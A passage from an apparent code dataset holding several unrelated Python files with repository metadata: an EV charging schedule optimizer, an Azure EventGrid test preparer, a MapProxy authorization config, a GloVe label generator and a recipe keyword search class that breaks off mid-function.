[schedule[:, i] <= np.maximum(np.max(self.power[:, i]), self.charge_rate)]\n if self.departure_inds[i] >= self.arrival_inds[i]:\n if self.arrival_inds[i] > 0:\n constraints += [schedule[np.arange(0, int(self.arrival_inds[i])), i] <= 0]\n if self.departure_inds[i] < 96:\n constraints += [schedule[np.arange(int(self.departure_inds[i]), 96), i] <= 0]\n else:\n constraints += [schedule[np.arange(int(self.departure_inds[i]), int(self.arrival_inds[i])), i] <= 0]\n\n constraints += [0.25 * cvx.sum(schedule, axis=0) == self.energies]\n\n prob = cvx.Problem(cvx.Minimize(obj), constraints)\n result = prob.solve(solver=cvx.MOSEK)\n if verbose:\n print('Given subscription level', subscription_level, 'the objective result is', result)\n\n self.pge_cev_energyonly_controlled_power = schedule.value\n # Not likely necessary since there is no cap constraint, but this was implemented just in case this method\n # throws an error:\n try:\n self.controlled_total_load = np.sum(schedule.value, axis=1)\n except:\n try:\n self.controlled_total_load = -1 * np.ones((96, ))\n except:\n donothing=1\n\n def e19_controlled_load(self, verbose=False):\n \"\"\"Implements the charging control for the PG&E E19 rate schedule. This is not specific to EVs but has been how\n sites like Google campus traditionally are charged for their loads. It includes TOU and demand charges.\n Please refer to the first control method, `sdge_controlled_load', for comments on the\n optimization set up and constraints which are common between the two.\n \"\"\"\n peak_inds, partpeak_inds, offpeak_inds, energy_prices, rate_demand_peak, rate_demand_partpeak, rate_demand_overall = e19_values()\n\n schedule = cvx.Variable((96, self.num_sessions))\n obj = cvx.matmul(cvx.sum(schedule, axis=1), energy_prices.reshape((np.shape(energy_prices)[0], 1))) # TOU\n obj += rate_demand_overall * cvx.max(cvx.sum(schedule, axis=1)) # Demand charge on the whole day\n obj += rate_demand_peak * cvx.max(cvx.sum(schedule[peak_inds, :], axis=1)) # Peak period demand charge\n obj += rate_demand_partpeak * cvx.max(cvx.sum(schedule[partpeak_inds, :], axis=1)) # Shoulder period demand charge\n\n constraints = [schedule >= 0]\n for i in range(self.num_sessions):\n constraints += [schedule[:, i] <= np.maximum(np.max(self.power[:, i]), self.charge_rate)]\n if self.departure_inds[i] >= self.arrival_inds[i]:\n if self.arrival_inds[i] > 0:\n constraints += [schedule[np.arange(0, int(self.arrival_inds[i])), i] <= 0]\n if self.departure_inds[i] < 96:\n constraints += [schedule[np.arange(int(self.departure_inds[i]), 96), i] <= 0]\n else:\n constraints += [schedule[np.arange(int(self.departure_inds[i]), int(self.arrival_inds[i])), i] <= 0]\n\n constraints += [0.25 * cvx.sum(schedule, axis=0) == self.energies]\n\n prob = cvx.Problem(cvx.Minimize(obj), constraints)\n result = prob.solve(solver=cvx.MOSEK)\n # Not likely necessary since there is no cap constraint, but this was implemented just in case this method\n # throws an error:\n if verbose:\n print('The objective result: ', result)\n if schedule.value is None:\n print('Optimization failed')\n else:\n self.e19_controlled_power = schedule.value\n self.controlled_total_load = np.sum(schedule.value, axis=1)\n\n def sce_touev8_controlled_load(self, verbose=False, summer=True):\n \"\"\"Implements the charging control for the SCE TOU-EV8 rate schedule which includes only a TOU rate, no demand\n charges or subscriptions.\n Please refer to the first control method, `sdge_controlled_load', for comments on the\n optimization set up and constraints which are common between the two.\n \"\"\"\n\n peak_inds, partpeak_inds, offpeak_inds, superoffpeak_inds, energy_prices = sce_touev8_values(summer=summer)\n\n schedule = cvx.Variable((96, self.num_sessions))\n obj = cvx.matmul(cvx.sum(schedule, axis=1), energy_prices.reshape((np.shape(energy_prices)[0], 1)))\n\n constraints = [schedule >= 0]\n for i in range(self.num_sessions):\n constraints += [schedule[:, i] <= np.maximum(np.max(self.power[:, i]), self.charge_rate)]\n if self.departure_inds[i] >= self.arrival_inds[i]:\n if self.arrival_inds[i] > 0:\n constraints += [schedule[np.arange(0, int(self.arrival_inds[i])), i] <= 0]\n if self.departure_inds[i] < 96:\n constraints += [schedule[np.arange(int(self.departure_inds[i]), 96), i] <= 0]\n else:\n constraints += [schedule[np.arange(int(self.departure_inds[i]), int(self.arrival_inds[i])), i] <= 0]\n\n constraints += [0.25 * cvx.sum(schedule, axis=0) == self.energies]\n\n prob = cvx.Problem(cvx.Minimize(obj), constraints)\n result = prob.solve(solver=cvx.MOSEK)\n if verbose:\n print('The objective result: ', result)\n\n self.sce_touev8_controlled_power = schedule.value\n self.controlled_total_load = np.sum(schedule.value, axis=1)\n\n\ndef pge_cev_values():\n rate_energy_peak = 0.30267\n rate_energy_partpeak = 0.11079\n rate_energy_offpeak = 0.08882\n\n subscription_rate_per50kw = 183.86\n peak_inds = np.arange(int(16*4), int(22*4)) # Peak from 4pm to 10pm\n # Partpeak from 10pm to 9am and 2pm to 4pm\n partpeak_inds = np.concatenate((np.arange(int(22*4), int(24*4)), np.arange(0, int(9*4)), np.arange(int(14*4), int(16*4))))\n offpeak_inds = np.arange(int(9*4), int(14*4)) # Offpeak from 9am to 2pm (peak solar)\n\n # energy_prices is ((96,)) shape\n energy_prices = np.concatenate(\n (np.repeat(rate_energy_partpeak, int(9 * 4)), np.repeat(rate_energy_offpeak, int(5 * 4)),\n np.repeat(rate_energy_partpeak, int(2 * 4)), np.repeat(rate_energy_peak, int(6 * 4)),\n np.repeat(rate_energy_partpeak, int(2 * 4))))\n\n return peak_inds, partpeak_inds, offpeak_inds, energy_prices, subscription_rate_per50kw\n\n\ndef e19_values():\n rate_energy_peak = 0.16997\n rate_energy_partpeak = 0.12236\n rate_energy_offpeak = 0.09082\n rate_demand_peak = 21.23\n rate_demand_partpeak = 5.85\n rate_demand_overall = 19.10\n\n # Peak is 12pm to 6pm, partpeak is 8:30am to 12pm and 6pm to 9:30pm, offpeak is 9:30pm to 8:30am\n energy_prices = np.concatenate(\n (np.repeat(rate_energy_offpeak, int(8.5 * 4)), np.repeat(rate_energy_partpeak, int(3.5 * 4)),\n np.repeat(rate_energy_peak, int(6 * 4)), np.repeat(rate_energy_partpeak, int(3.5 * 4)),\n np.repeat(rate_energy_offpeak, int(2.5 * 4))))\n\n peak_inds = np.arange(int(12 * 4), int(18 * 4))\n partpeak_inds = np.concatenate((np.arange(int(8.5 * 4), int(12 * 4)), np.arange(int(18 * 4), int(21.5 * 4))))\n offpeak_inds = np.concatenate((np.arange(0, int(8.5 * 4)), np.arange(int(21.5 * 4), int(24 * 4))))\n\n return peak_inds, partpeak_inds, offpeak_inds, energy_prices, rate_demand_peak, rate_demand_partpeak, rate_demand_overall\n\n\ndef sce_touev8_values(summer=True):\n rate_energy_peak = 0.37\n rate_energy_partpeak = 0.26\n rate_energy_offpeak = 0.13\n rate_energy_superoffpeak = 0.08\n\n if summer:\n # Peak is 3pm to 8pm, offpeak is 8pm to 3pm.\n energy_prices = np.concatenate(\n (np.repeat(rate_energy_offpeak, int(15 * 4)), np.repeat(rate_energy_peak, int(5 * 4)),\n np.repeat(rate_energy_offpeak, int(4 * 4))))\n\n peak_inds = np.arange(int(15 * 4), int(20 * 4))\n partpeak_inds = []\n offpeak_inds = np.concatenate((np.arange(0, int(15 * 4)), np.arange(int(20 * 4), int(24 * 4))))\n superoffpeak_inds = []\n else:\n energy_prices = np.concatenate(\n (np.repeat(rate_energy_offpeak, int(7 * 4)), np.repeat(rate_energy_superoffpeak, int(8 * 4)),\n np.repeat(rate_energy_partpeak, int(5 * 4)), np.repeat(rate_energy_offpeak, int(4 * 4))))\n peak_inds = []\n partpeak_inds = np.arange(int(15 * 4), int(20 * 4))\n offpeak_inds = np.concatenate((np.arange(0, int(7 * 4)), np.arange(int(20 * 4), int(24 * 4))))\n superoffpeak_inds = np.arange(int(7 * 4), int(15 * 4))\n\n return peak_inds, partpeak_inds, offpeak_inds, superoffpeak_inds, energy_prices\n\n\ndef sdge_values(method='median', summer=True, percentile=50):\n\n # This csv includes all the prices from the month of july - the prices were dynamic, not based on a preset TOU\n # time. They are organized into days in rate_days and then energy_prices is calculated by either taking the median\n # across the days, some other percentile, or picking a random particular day.\n if summer:\n try:\n sdge = pd.read_csv('sdge_pricing_july2019.csv', header=None)\n except:\n sdge = pd.read_csv('/Users/spowell2/Documents/sdge_pricing_july2019.csv', header=None)\n\n weekdays = [1, 2, 3, 4, 5, 8, 9, 10, 11, 12, 15, 16, 17, 18, 19, 22, 23, 24, 25, 26, 29, 30, 31, 32, 33]\n rate_days = np.zeros((24, max(weekdays) + 1))\n ct = 0\n for i in range(max(weekdays) + 1):\n if i in weekdays:\n rate_days[:, ct] = sdge.loc[np.arange(i * 24, (i + 1) * 24), 2]\n ct += 1\n else:\n print('Get winter prices from sdge.')\n\n if method == 'median':\n energy_prices = np.median(rate_days, axis=1)\n elif method == 'percentile':\n energy_prices = np.percentile(rate_days, percentile, axis=1)\n elif method == 'random':\n energy_prices = rate_days[:, int(np.random.choice(np.arange(0, np.shape(rate_days)[1])))]\n\n energy_prices = np.repeat(energy_prices, 4) # Extend to 15min intervals\n\n return energy_prices\n","repo_name":"slacgismo/SCRIPT-tool","sub_path":"PaperCode/CustomRate/loadmodel.py","file_name":"loadmodel.py","file_ext":"py","file_size_in_byte":25639,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"31"} +{"seq_id":"43118387356","text":"import functools\nimport hashlib\nimport os\nfrom collections import namedtuple\n\nfrom azure_devtools.scenario_tests import ReplayableTest\nfrom azure.core.credentials import AccessToken\nfrom azure.mgmt.eventgrid import EventGridManagementClient\nfrom azure.mgmt.eventgrid.models import Topic, InputSchema, JsonInputSchemaMapping, JsonField, JsonFieldWithDefault\nfrom azure_devtools.scenario_tests.exceptions import AzureTestError\n\nfrom devtools_testutils import (\n ResourceGroupPreparer, AzureMgmtPreparer, FakeResource, AzureMgmtTestCase\n)\n\nfrom devtools_testutils.resource_testcase import RESOURCE_GROUP_PARAM\n\nEVENTGRID_TOPIC_PARAM = 'eventgrid_topic'\nEVENTGRID_TOPIC_LOCATION = 'westus'\nCLOUD_EVENT_SCHEMA = InputSchema.cloud_event_schema_v1_0\nCUSTOM_EVENT_SCHEMA = InputSchema.custom_event_schema\nID_JSON_FIELD = JsonField(source_field='customId')\nTOPIC_JSON_FIELD = JsonField(source_field='customTopic')\nEVENT_TIME_JSON_FIELD = JsonField(source_field='customEventTime')\nEVENT_TYPE_JSON_FIELD_WITH_DEFAULT = JsonFieldWithDefault(source_field='customEventType', default_value='')\nSUBJECT_JSON_FIELD_WITH_DEFAULT = JsonFieldWithDefault(source_field='customSubject', default_value='')\nDATA_VERSION_JSON_FIELD_WITH_DEFAULT = JsonFieldWithDefault(source_field='customDataVersion', default_value='')\nCUSTOM_JSON_INPUT_SCHEMA_MAPPING = JsonInputSchemaMapping(id=ID_JSON_FIELD, topic=TOPIC_JSON_FIELD, event_time=EVENT_TIME_JSON_FIELD, event_type=EVENT_TYPE_JSON_FIELD_WITH_DEFAULT, subject=SUBJECT_JSON_FIELD_WITH_DEFAULT, data_version=DATA_VERSION_JSON_FIELD_WITH_DEFAULT)\n\nclass FakeTokenCredential(object):\n \"\"\"Protocol for classes able to provide OAuth tokens.\n :param str scopes: Lets you specify the type of access needed.\n \"\"\"\n def __init__(self):\n self.token = AccessToken(\"YOU SHALL NOT PASS\", 0)\n\n def get_token(self, *args):\n return self.token\n\nclass EventGridTopicPreparer(AzureMgmtPreparer):\n def __init__(self,\n name_prefix='',\n use_cache=False,\n parameter_location=EVENTGRID_TOPIC_LOCATION,\n parameter_name=EVENTGRID_TOPIC_PARAM,\n resource_group_parameter_name=RESOURCE_GROUP_PARAM,\n disable_recording=True, playback_fake_resource=None,\n client_kwargs=None, random_name_enabled=True):\n super(EventGridTopicPreparer, self).__init__(name_prefix, random_name_length=24,\n random_name_enabled=random_name_enabled,\n disable_recording=disable_recording,\n playback_fake_resource=playback_fake_resource,\n client_kwargs=client_kwargs)\n self.resource_group_parameter_name = resource_group_parameter_name\n self.parameter_name = parameter_name\n self.parameter_location = parameter_location\n self.name_prefix = name_prefix\n if random_name_enabled:\n self.resource_moniker = self.name_prefix + \"egtopic\"\n \n self.set_cache(use_cache, name_prefix)\n\n def create_resource(self, name, **kwargs):\n if self.is_live:\n self.client = self.create_mgmt_client(EventGridManagementClient)\n group = self._get_resource_group(**kwargs)\n\n if self.name_prefix.startswith(\"cloud\"):\n # Create a new topic and verify that it is created successfully\n topic = Topic(location=self.parameter_location, tags=None, input_schema=CLOUD_EVENT_SCHEMA, input_schema_mapping=None)\n elif self.name_prefix.startswith(\"custom\"):\n # Create a new topic and verify that it is created successfully\n topic = Topic(location=self.parameter_location, tags=None, input_schema=CUSTOM_EVENT_SCHEMA, input_schema_mapping=CUSTOM_JSON_INPUT_SCHEMA_MAPPING)\n else:\n topic = Topic(location=self.parameter_location)\n topic_operation = self.client.topics.begin_create_or_update(\n group.name,\n name,\n topic,\n )\n self.resource = topic_operation.result()\n key = self.client.topics.list_shared_access_keys(group.name, name)\n self.primary_key = key.key1\n self.endpoint = self.resource.endpoint\n else:\n self.resource = FakeResource(name=name, id=name)\n self.primary_key = \"ZmFrZV9hY29jdW50X2tleQ==\" # test key copied from sb_preparer\n self.endpoint = \"https://{}.westus-1.eventgrid.azure.net/api/events\".format(name)\n return {\n self.parameter_name: self.resource,\n '{}_primary_key'.format(self.parameter_name): self.primary_key,\n '{}_endpoint'.format(self.parameter_name): self.endpoint,\n }\n\n def remove_resource(self, name, **kwargs):\n if self.is_live:\n group = self._get_resource_group(**kwargs)\n self.client.topics.begin_delete(group.name, name, polling=False)\n\n def _get_resource_group(self, **kwargs):\n try:\n return kwargs.get(self.resource_group_parameter_name)\n except KeyError:\n template = 'To create this event grid topic resource, a resource group is required. Please add ' \\\n 'decorator @{} in front of this event grid topic preparer.'\n raise AzureTestError(template.format(ResourceGroupPreparer.__name__))\n\n\nCachedEventGridTopicPreparer = functools.partial(EventGridTopicPreparer, use_cache=True)\n","repo_name":"mirespace/python-azure","sub_path":"sdk/eventgrid/azure-eventgrid/tests/eventgrid_preparer.py","file_name":"eventgrid_preparer.py","file_ext":"py","file_size_in_byte":5607,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"4574921245","text":"from shapely.geometry import shape, MultiPolygon\nimport fiona\n#import logging\n#import sys\n#logging.basicConfig(stream=sys.stdout, level=logging.INFO)\n\nshp_border_region = MultiPolygon([shape(pol['geometry']) for pol in fiona.open('data/border_region.shp', 'r')])\n#shp_nsw_northern = MultiPolygon([shape(pol['geometry']) for pol in fiona.open('data/nsw_northern.shp', 'r')])\nshp_qld_southeast = MultiPolygon([shape(pol['geometry']) for pol in fiona.open('data/qld_southeast.shp', 'r')])\n\ndef auth(service, layers=[], environ=None, **kw):\n if service != 'wms.map' or not layers[0].endswith('_border'):\n return {'authorized':'full'}\n else:\n return {\n 'authorized':'partial',\n 'layers':\n {\n 'nsw_topo3_border': {\n 'map': True,\n 'limited_to':\n {\n 'geometry': shp_border_region.wkt,\n 'srs': 'EPSG:28356'\n }\n },\n 'qld_topo_border':\n {\n 'map': True,\n 'limited_to':\n {\n 'geometry': shp_qld_southeast.wkt,\n 'srs': 'EPSG:28356'\n }\n }\n }\n }\n\nfrom mapproxy.wsgiapp import make_wsgi_app\n_application = make_wsgi_app(r'aus_src.yaml')\n\ndef application(environ, start_response):\n environ['mapproxy.authorize'] = auth\n return _application(environ, start_response)\n","repo_name":"mryellow/debian-scripts","sub_path":"assets/mapproxy/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"2926381645","text":"import os,sys,sys,re\nimport json\nfrom glove import Glove\nimport numpy as np\nfrom gensim import corpora\nsys.path.append(\"../LDA\")\nfrom preprocess_text import preprocess\n\nprint (' builds a dictionary with images paths as keys and GloVe space probability distributions as values')\nprint (' these probability distributions are then used as labels')\nprint (' for training a CNN to predict the semantic context in which images appear')\nprint (' (...)')\n\nNUM_TOPICS_arr = [40,300]\n\nfor NUM_TOPICS in NUM_TOPICS_arr:\n db_dir = '../data/ImageCLEF_Wikipedia/'\n train_dict_path = '../LDA/train_dict_ImageCLEF_Wikipedia.json'\n\n if not os.path.isdir(db_dir):\n sys.exit('ERR: Dataset folder '+db_dir+' not found!')\n\n if not os.path.isfile(train_dict_path):\n sys.exit('ERR: Train dictionary file '+train_dict_path+' not found!')\n\n with open(train_dict_path) as f:\n train_dict = json.load(f)\n\n # load id <-> term dictionary\n if not os.path.isfile('./dictionary.dict'):\n sys.exit('ERR: ID <-> Term dictionary file ./dictionary.dict not found!')\n\n print ('Loading id <-> term dictionary from ./dictionary.dict ...',)\n sys.stdout.flush()\n dictionary = corpora.Dictionary.load('./dictionary.dict')\n print (' Done!')\n # ignore words that appear in less than 20 documents or more than 50% documents\n dictionary.filter_extremes(no_below=20, no_above=0.5)\n\n # load GloVe model\n if not os.path.isfile('glovemodel'+str(NUM_TOPICS)+'.glove'):\n sys.exit('ERR: GloVe model file ./word2vecmodel'+str(NUM_TOPICS)+'.glove not found!')\n\n print ('Loading GloVe model from file ./glovemodel'+str(NUM_TOPICS)+'.glove ...',)\n sys.stdout.flush()\n glovemodel = Glove.load('glovemodel'+str(NUM_TOPICS)+'.glove')\n print (' Done!')\n\n # transform ALL documents into GloVe space\n target_labels = {}\n for img_path in train_dict.keys():\n with open(db_dir+train_dict[img_path]) as fp: raw = fp.read()\n\n tokens = preprocess(raw)\n\n # ignore words that appear in less than 20 documents or more than 50% documents\n filtered_tokens = []\n for word in tokens:\n if word in dictionary.token2id: filtered_tokens.append(word)\n\n # Compute GloVe embedding for each word in the text and take its mean\n embedding = np.zeros(NUM_TOPICS)\n num_words = 0\n for word in filtered_tokens:\n try:\n embedding += glovemodel.word_vectors[glovemodel.dictionary[word]]\n num_words += 1\n except:\n print (\"Word not in model: \" + word)\n continue\n if num_words > 1: embedding /= num_words\n\n # L2 normalize the embedding\n if min(embedding) < 0: embedding = embedding - min(embedding)\n if sum(embedding) > 0: embedding = embedding / np.linalg.norm(embedding)\n\n target_labels[img_path] = embedding.tolist()\n\n sys.stdout.write('\\r%d/%d text documents processed...' % (len(target_labels),len(train_dict.keys())))\n sys.stdout.flush()\n sys.stdout.write(' Done!\\n')\n\n # save key,labels pairs into json format file\n with open('./training_labels'+str(NUM_TOPICS)+'.json','w') as fp:\n json.dump(target_labels, fp)\n","repo_name":"gombru/TextTopicNet","sub_path":"GloVe/generate_train_labels.py","file_name":"generate_train_labels.py","file_ext":"py","file_size_in_byte":3246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"31"} +{"seq_id":"32071334679","text":"from bs4 import BeautifulSoup\r\nimport os, nltk\r\n\r\nclass Search():\r\n\r\n def __init__(self, keywords = False, corpus = False, lang = 1):\r\n self.keywords = set(keywords)\r\n self.corpus = corpus\r\n self.lang = lang\r\n\r\n # get a tagged text: exemple [je suis libre] => [('je', P), ('suis', VB), ('libre', ADJ)]\r\n def getTagged(self, text):\r\n from nltk.tag import StanfordPOSTagger\r\n\r\n if self.lang == 1:\r\n jar = 'stanford-pos-tagger/stanford-postagger-3.8.0.jar'\r\n model = 'stanford-pos-tagger/french.tagger'\r\n pos_tagger = StanfordPOSTagger(model, jar, encoding='utf8' )\r\n tokenizedText = nltk.word_tokenize(text.lower())\r\n taggedText = pos_tagger.tag(tokenizedText)\r\n else:\r\n jar = 'stanford-pos-tagger/stanford-postagger-3.8.0.jar'\r\n model = 'stanford-pos-tagger/arabic.tagger'\r\n pos_tagger = StanfordPOSTagger(model, jar, encoding='utf8' )\r\n tokenizedText = nltk.word_tokenize(text.lower())\r\n taggedText = pos_tagger.tag(tokenizedText)\r\n print(taggedText)\r\n return taggedText\r\n \r\n\r\n def getStemmedText(self, text):\r\n stemmedText = []\r\n if self.lang == 1:\r\n stemmer = nltk.stem.snowball.FrenchStemmer()\r\n stemmedText = [stemmer.stem(word) for word in text if word.isalpha()]\r\n else:\r\n from tashaphyne.stemming import ArabicLightStemmer\r\n ArListem = ArabicLightStemmer()\r\n for word in text:\r\n if word.isalpha():\r\n stem = ArListem.light_stem(word)\r\n root = ArListem.get_root()\r\n stemmedText.append(root)\r\n return stemmedText\r\n\r\n\r\n\r\n # transform my XML page to Beautifull soup object\r\n def getCorpusSoup(self):\r\n file = open(self.corpus, 'r')\r\n content = file.read()\r\n return BeautifulSoup(content,\"lxml\")\r\n\r\n\r\n # just to split sentence to words\r\n def text2list(self, text): \r\n tokenizedText = nltk.word_tokenize(text.lower())\r\n return tokenizedText\r\n\r\n\r\n # check if my recipe contain a denied ingredient (porc, liqueur...)\r\n def isDenied(self, content, denied):\r\n # Content: title or recipe or category \r\n # Denied: my word list to denied\r\n splitedContent = self.text2list(content)\r\n for ing in denied:\r\n if ing in splitedContent:\r\n return False\r\n return True\r\n\r\n\r\n # just to build correctly my denied word list: french stop words + colors ...etc\r\n def getDeniedWords(self):\r\n deniedList = []\r\n if self.lang == 1:\r\n colors = ['blanc', 'noir', 'rouge', 'jaune'] # à compléter\r\n otherWord = ['tous', 'les', 'ingrédients', 'moitiés', 'trait', 'frais', 'ensemble', 'petits', 'grand', 'préparation', 'préparations', 'poisson', 'légumes', 'fruits', 'épices', 'service', 'plat']\r\n haram = ['vin', 'porc', 'liqueur', 'cochenille', 'mulet', 'jambon', 'alcool', 'bière', 'rhum', 'vodka', 'whisky', 'tequila', 'Gin', 'cognac', 'pastis', 'lardon', 'champagne']#à compléter\r\n from nltk.corpus import stopwords\r\n stopWords = stopwords.words('french')\r\n deniedList.extend(colors)\r\n deniedList.extend(otherWord)\r\n deniedList.extend(haram)\r\n deniedList.extend(stopWords)\r\n else:\r\n colors = [] # à compléter\r\n otherWord = []\r\n from stop_words import get_stop_words\r\n stopWords = get_stop_words('arabic')\r\n deniedList.extend(colors)\r\n deniedList.extend(otherWord)\r\n deniedList.extend(stopWords)\r\n \r\n return self.getStemmedText(deniedList)\r\n\r\n # transform a recipe on XML format to a keywords list\r\n def getKeyWords(self, text):\r\n deniedList = set(self.getDeniedWords())\r\n keywords = []\r\n if self.lang == 1:\r\n for line in text:\r\n tline = self.getTagged(line)\r\n ntline = [taggedWord[0] for taggedWord in tline if taggedWord[1].startswith('N')]\r\n stemmedNTLine = set(self.getStemmedText(ntline))\r\n cleanText = stemmedNTLine - deniedList\r\n keywords.extend(list(cleanText))\r\n else:\r\n # from nltk.stem.isri import ISRIStemmer\r\n # stemmer = ISRIStemmer()\r\n for line in text:\r\n tline = self.getTagged(line)\r\n tline = [(item[1].split('/')[0], item[1].split('/')[1]) for item in tline]\r\n ntline = [taggedWord[0] for taggedWord in tline if (taggedWord[1].startswith('N') or taggedWord[1].startswith('DTN'))]\r\n stemmedNTLine = set(self.getStemmedText(ntline))\r\n cleanText = stemmedNTLine - deniedList\r\n keywords.extend(list(cleanText))\r\n # cleanText = [stemmer.stem(word) for word in ntline if stemmer.stem(word) not in deniedList and word.isalpha()]\r\n # keywords.extend(cleanText)\r\n return set(keywords)\r\n\r\n\r\n # search a recipe by ID\r\n def idSearch(self, idRecipe):\r\n soup = self.getCorpusSoup()\r\n recipe = [ balise.text for balise in soup.find_all(\"rec\", attrs={\"id\" : idRecipe}) ]\r\n return recipe\r\n\r\n # get recipe ID\r\n def findById(self, rec):\r\n soup = BeautifulSoup(rec)\r\n idRecipe = soup.find(\"rec\")['id']\r\n return idRecipe\r\n\r\n\r\n def existNb(self, keywords, recipeKeyWords):\r\n return len(set(set(keywords)).intersection(set(recipeKeyWords)))\r\n\r\n\r\n def compare(self, keywords, recipeKeyWords):\r\n nbWords = self.existNb(keywords, recipeKeyWords)\r\n lenRecipeKeyWords = len(set(recipeKeyWords))\r\n prop = round(float((nbWords / lenRecipeKeyWords) * 100), 2)\r\n if prop == 0:\r\n return -2, prop \r\n elif prop < 30:\r\n return -1, prop\r\n elif prop >= 30 and prop < 60: \r\n return 0, prop\r\n else:\r\n return 1, prop\r\n\r\n\r\n # non desirable ingredient\r\n def getNonDesirable(self, choice):\r\n if self.lang == 1:\r\n notBio = ['acide'] #à compléter\r\n notVegan = ['viandes', 'poisson', 'poulet', 'escalope', 'canard', 'chèvre', 'œuf', 'graisse'] #à compélter\r\n diab = ['sucres', 'miel', 'tarte', 'pâtisserie'] #à compélter\r\n noCrustace = ['homard', 'langoustes', 'tourteaux', 'crabes', 'araignée', 'écrevisse', 'étrille' 'crevettes','fruits de mer', 'moules', 'huîtres', 'oursin', 'saumon'] #à compélter\r\n noGlutin = ['blé', 'seigle','orge','avoine', 'blé','épeautre','engrain', 'farine', 'semoule', 'boulgour', 'amidon', 'muesli', 'pâtes'] #à compélter\r\n noArachides = ['arachide', 'arachin', 'cacahuète', 'conarachin', 'mandelonas', 'noix'] #à compélter\r\n noLait = ['lait', 'fromage', 'beurre', 'yaourts', 'kéfir', 'viili', 'bifidus', 'caséine', 'babeurre', 'crème'] #à compélter\r\n haram = ['vin', 'porc', 'liqueur', 'cochenille', 'mulet', 'jambon', 'alcool', 'bière', 'rhum', 'vodka', 'whisky', 'tequila', 'Gin', 'cognac', 'pastis', 'lardon', 'champagne']#à compléter\r\n\r\n else:\r\n notBio = ['acide'] #à compélter\r\n notVegan = ['viandes', 'poisson', 'poulet']#à compélter\r\n diab = ['sucres', 'miel'] #à compélter\r\n noCrustace = [''] #à compélter\r\n noGlutin = [''] #à compélter\r\n noArachides = [''] #à compélter\r\n noLait = [''] #à compélter\r\n haram = ['vin', 'porc', 'liqueur', 'cochenille', 'mulet']#à compléter\r\n\r\n nonDesirable = []\r\n if 1 in choice: \r\n nonDesirable.extend(notBio)\r\n if 2 in choice:\r\n nonDesirable.extend(notVegan)\r\n if 3 in choice:\r\n nonDesirable.extend(diab)\r\n if 4 in choice:\r\n nonDesirable.extend(noCrustace)\r\n if 5 in choice:\r\n nonDesirable.extend(noGlutin)\r\n if 6 in choice:\r\n nonDesirable.extend(noArachides)\r\n if 7 in choice:\r\n nonDesirable.extend(noLait)\r\n nonDesirable.extend(haram)\r\n return self.getStemmedText(nonDesirable)\r\n\r\n\r\n def getBySet(self):\r\n frInverse = open('corpusFr/frInverse.txt', 'r')\r\n queryKeywords = ['croustill', 'beignet']\r\n for Qkeyword in queryKeywords: \r\n for line in frInverse.readlines():\r\n lineSplited = line.split(',')\r\n keyword = lineSplited[0]\r\n if Qkeyword == keyword:\r\n print(lineSplited[1:])\r\n print(Qkeyword)\r\n\r\n\r\n #lang=1 french / lang=2 arabe\r\n def getResult(self, queryKeywords, lang):\r\n lang = self.lang\r\n corpusKeyWords = open('corpusFr/frInverse.txt', 'r') if lang == 1 else open('corpusAr/arKeyWords.txt', 'r')\r\n content = corpusKeyWords.readlines()\r\n content = [w[:-1] for w in content]\r\n idRecipes = {}\r\n recipesList = []\r\n for line in content:\r\n lineContent = line.split(',')\r\n keyWord = lineContent[0]\r\n if keyWord in queryKeywords:\r\n recipesList.append(lineContent[1:len(lineContent)])\r\n idRecipes = set(recipesList[0])\r\n for wordList in recipesList:\r\n idRecipes.intersection(set(wordList))\r\n return idRecipes\r\n\r\n\r\n # transform my XML page to Beautifull soup object\r\n def getCorpusSoupById(self, idRecipe):\r\n if idRecipe >= 1 and idRecipe < 1000 :\r\n corpus = 'corpusFr/frCorpus1.txt'\r\n elif idRecipe >= 1000 and idRecipe < 2000 :\r\n corpus = 'corpusFr/frCorpus2.txt'\r\n elif idRecipe >= 2000 and idRecipe < 3000 :\r\n corpus = 'corpusFr/frCorpus3.txt'\r\n elif idRecipe >= 3000 and idRecipe < 4000 :\r\n corpus = 'corpusFr/frCorpus4.txt'\r\n elif idRecipe >= 4000 and idRecipe < 5000 :\r\n corpus = 'corpusFr/frCorpus5.txt'\r\n elif idRecipe >= 5000 and idRecipe < 6000 :\r\n corpus = 'corpusFr/frCorpus6.txt'\r\n elif idRecipe >= 6000 and idRecipe < 7000 :\r\n corpus = 'corpusFr/frCorpus7.txt'\r\n elif idRecipe >= 7000 and idRecipe < 8000 :\r\n corpus = 'corpusFr/frCorpus8.txt'\r\n elif idRecipe >= 8000 and idRecipe < 9000 :\r\n corpus = 'corpusFr/frCorpus78.txt'\r\n elif idRecipe >= 9000 and idRecipe < 10000 :\r\n corpus = 'corpusFr/frCorpus9.txt'\r\n elif idRecipe >= 10000 and idRecipe < 11000 :\r\n corpus = 'corpusFr/frCorpus10.txt'\r\n elif idRecipe >= 11000 and idRecipe < 12000 :\r\n corpus = 'corpusFr/frCorpus11.txt'\r\n elif idRecipe >= 12000 and idRecipe < 13000 :\r\n corpus = 'corpusFr/frCorpus12.txt'\r\n elif idRecipe >= 13000 and idRecipe < 14000 :\r\n corpus = 'corpusFr/frCorpus13.txt'\r\n elif idRecipe >= 14000 and idRecipe < 15000 :\r\n corpus = 'corpusFr/frCorpus14.txt'\r\n elif idRecipe >= 15000 and idRecipe < 16000 :\r\n corpus = 'corpusFr/frCorpus15.txt'\r\n elif idRecipe >= 16000 and idRecipe < 17000 :\r\n corpus = 'corpusFr/frCorpus16.txt'\r\n elif idRecipe >= 17000 and idRecipe < 18000 :\r\n corpus = 'corpusFr/frCorpus17.txt'\r\n elif idRecipe >= 18000 and idRecipe < 18440 :\r\n corpus = 'corpusFr/frCorpus18.txt'\r\n else:\r\n corpus = 'corpusFr/newCorpus.txt'\r\n file = open(corpus, 'r')\r\n content = file.read()\r\n return BeautifulSoup(content,\"lxml\")\r\n\r\n\r\n # search a recipe by ID specific data\r\n def idSearchRecipeData(self, idRecipe, checked):\r\n soup = self.getCorpusSoupById(int(idRecipe))\r\n title, cat, ing, prep, eng, inf = [], [], [], [], [], []\r\n deniedList = self.getNonDesirable(checked)\r\n for div in soup.find_all(\"rec\", attrs={\"id\" : str(idRecipe)}):\r\n\r\n check = False\r\n i = 0\r\n while not check and i < len(deniedList) :\r\n if 